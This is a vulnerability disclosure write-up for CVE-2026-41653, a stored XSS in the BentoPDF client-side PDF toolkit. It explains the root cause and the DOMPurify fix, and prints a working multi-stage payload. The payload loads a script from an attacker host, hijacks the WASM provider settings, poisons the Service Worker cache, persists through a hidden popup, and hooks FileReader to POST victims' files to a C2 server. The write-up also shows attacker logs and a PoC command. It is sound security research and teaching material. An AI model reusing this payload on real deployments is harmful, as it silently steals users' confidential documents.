CVE-2026-41653: Stored XSS > File Exfiltration in BentoPDF

One of the things I keep asking myself when I review source code is: “what is this application’s real attack surface?”. Not in the abstract sense (every application has attack surface), but in the concrete sense: if I get code execution here, what can I actually reach? What data moves through this thing, and where does it go?

I found BentoPDF while working on a personal project. I was browsing GitHub looking for interesting open-source tools, stumbled across it, and thought: privacy-first, fully client-side PDF processor, WebAssembly, zero backend. Architecturally unusual. Worth a closer look.

What I found was not a particularly exotic vulnerability at the source level: the injection point was, honestly, quite obvious once you know what you’re looking for. The real time went into building a PoC that demonstrated a concrete impact. Finding the bug is one thing, showing what an attacker actually does with it is another.

What is BentoPDF?

BentoPDF is a self-hosted, open-source PDF toolbox. Compress, merge, split, rotate, convert images and documents to PDF, extract pages, add watermarks, fill forms, sign: a Swiss Army knife for PDFs, all running in the browser. The Docker image is a single nginx container serving a statically-built Vite/TypeScript application. No backend. No server-side processing. Everything (and I mean everything) happens client-side using WebAssembly modules (PyMuPDF, Ghostscript, cpdf) that run directly in the browser.

The BentoPDF maintainer explicitly describes it as “The Privacy First PDF Toolkit”. The official website and the GitHub repository make the value proposition clear: no uploads to cloud services, no third-party servers, your documents stay on your machine. It’s the kind of tool that small teams, legal offices, and freelancers self-host precisely because they handle sensitive material they don’t want leaving their infrastructure.

That positioning is important context for what follows. The privacy guarantee is not just marketing: it is architecturally real. Files are processed entirely in the browser via WebAssembly and nothing is ever sent to the server. But that same architecture, under the conditions I’ll describe, can be inverted: instead of staying on your machine, files can leave it silently and be redirected to the attacker. The very property that makes BentoPDF trustworthy becomes the mechanism of the attack.

Code review

I started the usual way: understanding the architecture before reading individual files. Vite build, TypeScript source under src/js/, one entry point per tool (markdown-to-pdf.html, compress-pdf.html, etc.), nginx serving everything as static files. No API endpoints. No authentication. Just a browser application that receives your files, processes them in a WebAssembly sandbox, and returns the result.

The attack surface of an application with no backend is, at first glance, narrow. There is no SQL injection, no server-side template injection, no SSRF. What’s left? Essentially two things: XSS and anything that involves how user-controlled data is processed client-side.

I focused on input entry points: file uploads, text inputs, configuration fields. Then the Markdown-to-PDF converter caught my attention, and if you have any web security research experience you’ll immediately understand why. It renders user-supplied Markdown in a live preview. Live preview means: user input > rendering > DOM.

So I started tracing the code.

Flaw 1: `html: true` in markdown-it

src/js/utils/markdown-editor.ts, lines 271–272:

private mdOptions: MarkdownItOptions = {
  html: true,
  breaks: false,
  linkify: true,
  typographer: true,
};

markdown-it with html: true is explicitly documented as unsafe: raw HTML tags in the input pass through the parser unchanged. The library’s own security documentation says this option should only be enabled when you fully trust the input, or when you sanitize the output before injecting it into the DOM. Neither condition was met here.

Tags like <img>, <svg>, <details>, <video> with event handler attributes (onerror, onload, ontoggle, onmouseover) pass through without modification. This is by design: html: true is a flag that says “I want raw HTML”, and markdown-it delivers exactly that.

Flaw 2: Unsanitized `innerHTML`

src/js/utils/markdown-editor.ts, lines 689–694:

private updatePreview(): void {
  if (!this.editor || !this.preview) return;
  const markdown = this.editor.value;
  const html = this.md.render(markdown);
  this.preview.innerHTML = html;  // sink
  this.renderMermaidDiagrams();
}

The rendered string is assigned to innerHTML with nothing in between. No DOMPurify, no allow-list, no sanitization of any kind. The parser produces the string, the string goes straight into the DOM. The browser parses it, encounters the event handler, fires it.

Flaw 3: No Content-Security-Policy

nginx.conf ships with no Content-Security-Policy header. Injected JavaScript has complete freedom: it can load external scripts from any origin, issue fetch() or XMLHttpRequest requests to any host, open popup windows, register Service Workers. Any mitigating layer that a reasonable CSP would have provided is simply absent.

The trigger

A crafted .md file:

# Quarterly Financial Report Q1 2026

## Executive Summary

Revenue growth exceeded expectations at 12.3% YoY...

<img src=x onerror="var s=document.createElement('script');s.src='http://attacker/poc_payload.js';document.head.appendChild(s)">

## Outlook

Management maintains FY2026 guidance...

The victim opens this file in the Markdown-to-PDF tool. The preview renders immediately. The <img src=x> fails to load (the source is invalid), onerror fires, a <script> tag is injected into <head>, and the external payload is loaded. No CSP blocks it.

Thinking about the attack chain

This is where it gets interesting, and where I spent most of my time.

The sink is on the Markdown-to-PDF page. In a traditional web application with a backend, this would be a classic stored XSS: the payload persists server-side, anyone who views the page gets hit. But BentoPDF has no backend. The Markdown file lives on the victim’s machine. To exploit this, the attacker must deliver a crafted .md file to the victim and convince them to open it in the tool. Social engineering, shared drive, email attachment: the distribution mechanism is off-site.

Once the payload executes, I’m in the origin of the application. Now what?

In most web applications the answer is: steal the session cookie, do whatever the victim can do on the platform. But BentoPDF has no session, no authentication, no user account. There is nothing to steal in the traditional sense. This is the challenge that made the research genuinely interesting: the vulnerability was obvious, but making it matter required a different kind of thinking.

I started from a simple question: what is valuable in this application? Not credentials, not tokens, not API keys. The valuable thing is the data the user brings to it: the files. PDFs, contracts, invoices, medical documents, whatever reason someone chose a privacy-first self-hosted PDF tool rather than uploading to iLovePDF or Adobe online. The files are the crown jewels, and the entire processing pipeline (every read, every conversion) runs directly in the victim’s browser via the FileReader API and WebAssembly.

The insight that shaped the entire payload: the attacker’s code is now running in the same context that handles the victim’s files. If I hook FileReader.prototype.readAsArrayBuffer before BentoPDF calls it, I intercept every file the victim loads into any tool: not just Markdown-to-PDF, but Compress PDF, Merge PDF, Split PDF, everything. I don’t need server access. I don’t need credentials. I just need to stay resident in the browser.

But staying resident across page navigations is the hard part. BentoPDF uses a separate HTML file per tool: going from markdown-to-pdf.html to compress-pdf.html is a full page load. My hooks on the Markdown-to-PDF page die with the navigation. I needed persistence.

This is where the 1×1 pixel popup comes in, a technique that will likely be familiar to anyone who has ever visited an illegal streaming site. Those sites routinely open tiny off-screen windows that remain alive even after you close the main tab, silently running ad scripts or cryptocurrency miners. The browser’s popup mechanism is not subject to navigation events: a popup opened from page A stays open when page A navigates to page B. And crucially, window.opener in the popup still points to the navigated tab.

I used exactly this mechanism. A 1×1 popup, positioned off-screen, invisible to the victim, running a polling loop that re-injects the FileReader hook into the main window every time a navigation clears it. Within one second of any tool switch, the hooks are live again.

The payload: four stages

The payload is a multi-stage IIFE loaded once and designed to persist for as long as the victim has BentoPDF open.

Stage 1: WASM provider hijack

var _origWasm = localStorage.getItem('bentopdf:wasm-providers');
var wasmPayload = {
  pymupdf:     C2 + '/wasm/pymupdf/',
  ghostscript: C2 + '/wasm/gs/',
  cpdf:        C2 + '/wasm/cpdf/'
};
localStorage.setItem('bentopdf:wasm-providers', JSON.stringify(wasmPayload));
report('/hijack', { stage: 'wasm_hijack', victim: location.href, ts: new Date().toISOString() });
if (_origWasm !== null) {
  localStorage.setItem('bentopdf:wasm-providers', _origWasm);
} else {
  localStorage.removeItem('bentopdf:wasm-providers');
}

BentoPDF reads WASM module download URLs from localStorage['bentopdf:wasm-providers']. By overwriting this key, the attacker can redirect all WASM module downloads (PyMuPDF, Ghostscript, cpdf) to an attacker-controlled server. A trojanized WASM module would be executed with the same privileges as the original: full access to every PDF the victim processes, across every browser session.

In this PoC, the key is overwritten, the hijack is reported to the exfiltration server as proof, and then immediately restored, so the victim’s tools continue working normally without anything appearing anomalous.

Stage 2: Service Worker + cache poisoning (HTTPS only)

On HTTPS deployments (window.isSecureContext === true), the payload registers /sw.js as a Service Worker, then enumerates every /assets/*.js file across all BentoPDF tool pages and poisons the browser cache. Each poisoned entry has the original JavaScript content plus an appended hook:

;(function(){
  if (window.__BENTO_EXFIL__) return;
  window.__BENTO_EXFIL__ = 1;
  // ... FileReader hook + change event listener ...
  fetch(C2 + "/beacon", { ... });
})();

On subsequent visits, even after the tab is closed and reopened, the Service Worker serves the poisoned JS from cache. The hook re-installs itself automatically. This is persistence beyond the browser session, without any server access.

var popup = window.open('about:blank', '_bentopdf_helper', 'width=1,height=1,left=-100,top=-100');
popup.document.write(popupCode);
popup.document.close();
popup.blur(); window.focus();

A 1×1 pixel popup opens off-screen, invisible to the victim. Inside it runs a loop:

setInterval(function() {
  if (target && !target.closed && !target.__BENTO_EXFIL__) inject();
}, 1000);

Every second, the popup checks whether window.__BENTO_EXFIL__ is set on the main window. When the victim navigates from Markdown-to-PDF to another tool (Compress PDF, Merge PDF, etc.), the main window reloads a new page. The popup’s window.opener reference updates automatically: it still points to the same tab. __BENTO_EXFIL__ on the new page is undefined, so inject() fires: it re-hooks FileReader.prototype.readAsArrayBuffer and adds a change event listener on target.document. Within one second of any navigation, the hooks are live again.

This covers the persistence gap between stages: even without the Service Worker, the victim is hooked for the entire duration of the browser session.

Stage 4: Immediate hooks on the current page

var _origRead = FileReader.prototype.readAsArrayBuffer;
FileReader.prototype.readAsArrayBuffer = function(blob) {
  var fname = blob.name || 'unknown_' + Date.now();
  blob.arrayBuffer().then(function(buf) {
    fetch(C2 + '/file?name=' + encodeURIComponent(fname), {
      method: 'POST', mode: 'cors', body: buf
    }).catch(function(){});
  });
  return _origRead.call(this, blob);
};

document.addEventListener('change', function(e) {
  if (e.target && e.target.type === 'file' && e.target.files) {
    Array.from(e.target.files).forEach(function(f) {
      f.arrayBuffer().then(function(buf) {
        fetch(C2 + '/file?name=' + encodeURIComponent(f.name), {
          method: 'POST', mode: 'cors', body: buf
        }).catch(function(){});
      });
    });
  }
}, true);

Two hooks, installed immediately on the page where the payload fires.

The FileReader hook intercepts at the prototype level: every call to readAsArrayBuffer anywhere in the application goes through this wrapper first, which sends the raw bytes to the attacker before delegating to the original implementation. The application continues working normally: the processing pipeline is unaffected.

The change event listener on document (capture phase) catches every file input interaction before BentoPDF’s own handlers see it. The result is the same: the file bytes go out to the attacker the moment the victim selects a file.

What the attacker sees

[17:11:11] WASM HIJACK      { stage: 'wasm_hijack', victim: '.../markdown-to-pdf.html' }
[17:11:12] BEACON           { page: '.../markdown-to-pdf.html' }
[17:11:55] BEACON           { page: '.../index.html' }
[17:12:00] BEACON           { page: '.../compress-pdf.html' }
[17:12:01] FILE EXFILTRATED   Lorem_ipsum.pdf (23.7 KB) -> loot/171201_Lorem_ipsum.pdf
[17:13:57] BEACON           { page: '.../merge-pdf.html' }
[17:13:58] FILE EXFILTRATED   Lorem_ipsum.pdf (23.7 KB) -> loot/171358_Lorem_ipsum.pdf

When I saw the loot/ directory populate for the first time, with a complete valid PDF arriving on my machine while the victim’s application was still showing the compress operation completing successfully, the thought was: ok, this will convince the developers. Not an alert(1). An actual file, byte-for-byte identical to the original, silently exfiltrated while the UI showed nothing unusual. That’s the kind of evidence that communicates impact without any explanation required.

The PoC

The full proof of concept is available in the CVE-2026-41653 repository. It consists of a single self-contained Python script (poc.py) that:

Generates the malicious poc_report.md with the correct attacker URL embedded
Serves the payload JavaScript dynamically at /poc_payload.js
Receives exfiltrated files and telemetry, saves them to ./loot/

python3 poc.py --lhost <YOUR_IP> --lport 9999

Responsible disclosure

I reported via GitHub Security Advisory with the full technical description, the four-stage payload, and screenshots from the exfiltration server. I then found the maintainer’s contact on LinkedIn and messaged him to let him know a report was incoming.

He responded immediately. What followed was, genuinely, one of the best disclosure experiences I’ve had. The maintainer was courteous and attentive, both to the report itself and to his users. He acknowledged the finding quickly, released a fix on the edge build, asked me for a retest, and once I confirmed the fix was solid, published the GHSA advisory and personally notified his users of the potential risk. No pushback, no downplaying, no delays. An example of how responsible disclosure should work, on both sides.

A broader internal audit, following my report, uncovered several related vectors:

Mermaid diagrams: the Mermaid integration used securityLevel: 'loose' and wrote SVG content via innerHTML without sanitization, bypassing any sanitizer applied upstream. Fixed with securityLevel: 'strict' and a second DOMPurify pass on SVG output.
file.name XSS: approximately 8 tool pages (Deskew, Form Filler, Remove Annotations, etc.) concatenated the filename directly into HTML without escaping. A specially named file would trigger XSS without any Markdown involved.
WASM provider persistence: the localStorage key used to override WASM providers was not validated on load: any value set there would be used, with no origin check. An attacker who had already achieved WASM hijack through other means could leave it in place persistently.
Service Worker cache: the existing SW lacked integrity checks, making it trivially poisonable on HTTPS deployments.

All of these were addressed in v2.8.3, along with a full security header set in nginx.conf (including Content-Security-Policy).

The fix on the originally reported sink was:

import DOMPurify from 'dompurify';

private updatePreview(): void {
  if (!this.editor || !this.preview) return;
  const markdown = this.editor.value;
  const html = this.md.render(markdown);
  this.preview.innerHTML = DOMPurify.sanitize(html);
}

html: true can stay: it enables legitimate HTML in Markdown, which is a deliberate feature. The fix is to sanitize the output before it touches the DOM, which is exactly what DOMPurify is designed for.

Lessons learned

For developers:

html: true in markdown-it is a double-edged sword. The library’s documentation says it clearly: when enabled, you are responsible for sanitizing the output before DOM injection. If you let the parser produce raw HTML and then assign it to innerHTML, you have an XSS. DOMPurify between md.render() and innerHTML is the fix, not a workaround.
Client-side-only applications are not inherently safer than those with a backend. They have a different attack surface, not a smaller one. When your application is the processing environment for sensitive files, code execution in that environment is as damaging as server compromise.
A Content-Security-Policy is not optional in 2026. In this case, a directive like script-src 'self' would have blocked the external payload load at the browser level: the XSS could still fire inline handlers, but loading a multi-stage payload from a remote host would have been stopped. Defense in depth.
Filename sanitization is not optional. Concatenating file.name into HTML is an XSS waiting to happen. Use textContent for plain-text display, or sanitize if HTML is required.

For security researchers:

When you find an XSS in a client-side application, don’t stop at alert(1). Ask: what data does this application process? What APIs does it use? If the answer is FileReader and WebAssembly, you have everything you need to demonstrate a much more impactful scenario.
The architecture shapes the impact. A client-side PDF processor is interesting precisely because the files (potentially sensitive documents) never leave the browser. Once you have code execution in that context, that premise inverts completely: they do leave the browser, to the attacker.
Look at what the app stores in localStorage. Configuration, feature flags, provider URLs are often writable from XSS context and can have persistent effects.

What is BentoPDF?#

Code review#

Flaw 1: html: true in markdown-it#

Flaw 2: Unsanitized innerHTML#

Flaw 3: No Content-Security-Policy#

The trigger#

Thinking about the attack chain#

The payload: four stages#

Stage 1: WASM provider hijack#

Stage 2: Service Worker + cache poisoning (HTTPS only)#

Stage 3: Popup monitor#

Stage 4: Immediate hooks on the current page#

What the attacker sees#

The PoC#

Responsible disclosure#

Lessons learned#

References#